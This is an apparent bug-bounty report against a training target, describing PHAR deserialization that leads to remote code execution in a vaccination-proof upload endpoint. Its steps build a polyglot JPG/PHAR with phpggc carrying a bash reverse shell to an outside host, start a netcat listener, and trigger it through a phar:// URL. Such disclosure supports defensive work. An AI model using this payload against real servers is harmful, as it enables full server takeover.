Description

This is possible for an attacker to get remote code execution by uploading a phar file via the https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/submit-vaccination-proof.php endpoint. and then trigger the deserialization and get RCE using a phar:// uri on https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg

Step to reproduce

• clone the following repository https://github.com/ambionics/phpggc and go inside the directory

• run the following command :

  ./phpggc -pj /tmp/dummy.jpg -o /tmp/z.zip.phar monolog/rce4 "bash -i >& /dev/tcp/neolex.dev/8000 0>&1"                                                                                    

  with dummy.jpg any valid jpg file , and replacing neolex.dev by your domain or ip

• listen on port 8000 inside you server via nc -lnvp 8000

• Upload the following image ( /tmp/z.zip.phar) inside https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php

• look inside the burp proxy the request made to /api/checkproof.php for exemple in my case the request is for the url : https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg

• send this request to repeater and add phar:// before the path and send the request

  https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg

• You should have a reverse shell inside your netcat listener

Impact

Remote code execution, An attacker can completely takover the server and run a bash shell inside.